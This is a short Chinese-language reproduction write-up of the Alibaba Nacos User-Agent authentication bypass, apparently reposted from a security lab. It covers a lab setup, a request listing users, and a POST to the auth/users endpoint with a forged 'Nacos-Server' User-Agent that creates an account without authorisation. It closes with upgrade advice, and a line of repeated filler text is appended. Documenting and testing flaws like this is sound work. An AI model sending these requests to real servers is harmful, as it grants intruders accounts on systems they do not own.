alibaba+nacos权限认证绕过怎么办(三重权限认证卡)

影响范围

Nacos <= 2.0.0-ALPHA.1

漏洞类型

权限认证绕过

利用条件

影响范围应用

漏洞概述

2020年12月29日,Nacos官方在github发布的issue中披露Alibaba Nacos 存在一个由于不当处理User-Agent导致的未授权访问漏洞,攻击者可以通过该漏洞来创建新用户账户。

环境搭建

下载安装文件:

https://github.com/alibaba/nacos/releases/tag/2.0.0-ALPHA.1

之后执行以下命令启动环境:

./startup.sh -m standalone

alibaba+nacos权限认证绕过怎么办(三重权限认证卡)

之后访问http://your-ip:8848/nacos,默认账号密码为:nacos/nacos

alibaba+nacos权限认证绕过怎么办(三重权限认证卡)

漏洞复现

Step 1:查看用户列表

http://192.168.174.236:8848/nacos/v1/auth/users?pageNo=1&pageSize=1

alibaba+nacos权限认证绕过怎么办(三重权限认证卡)

Step 2:添加用户Al1ex

http://your-ip:8848/nacos/v1/auth/users        POST:Nacos-Server.......
username=Al1ex&password=Al1ex

alibaba+nacos权限认证绕过怎么办(三重权限认证卡)

Step 3:登录测试

alibaba+nacos权限认证绕过怎么办(三重权限认证卡)

成功登录:

安全建议

目前官方已发布最新版本,建议升级到最新版本~

参考链接

https://github.com/alibaba/nacos/issues/4593

—————————————————–

凑数字凑数字凑数字凑数字凑数字凑数字凑数字凑数字凑数字凑数字凑数字凑数字凑数字凑数字凑数字凑数字凑数字凑数字凑数字凑数字凑数字凑数字凑数字凑数字凑数字凑数字凑数字凑数字凑数字凑数字凑数字凑数字凑数字凑数字凑数字凑数字凑数字凑数字凑数字凑数字凑数字凑数字凑数字凑数字凑数字

原创文章,作者:七芒星实验室,如若转载,请注明出处:https://www.sudun.com/ask/34334.html

(0)
七芒星实验室's avatar七芒星实验室
上一篇 2024年4月8日 下午3:59
下一篇 2024年4月8日 下午4:01

相关推荐

发表回复

您的邮箱地址不会被公开。 必填项已用 * 标注